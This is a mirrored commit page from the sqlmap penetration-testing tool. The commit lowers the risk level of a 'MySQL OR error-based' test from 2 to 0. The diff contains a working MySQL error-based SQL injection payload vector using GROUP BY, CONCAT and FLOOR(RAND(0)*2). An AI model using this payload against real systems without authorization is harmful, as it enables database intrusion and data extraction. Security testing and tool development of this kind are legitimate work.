mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
changing risk level to 0 - lots of MySQL databases around have information_schema unreadable, thus disabling first AND based error payload
This commit is contained in:
parent
c0423761e8
commit
96c3ffd3d7
|
@ -912,7 +912,7 @@ Formats:
|
||||||
<title>MySQL OR error-based - WHERE clause</title>
|
<title>MySQL OR error-based - WHERE clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>2</level>
|
<level>2</level>
|
||||||
<risk>2</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
|
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user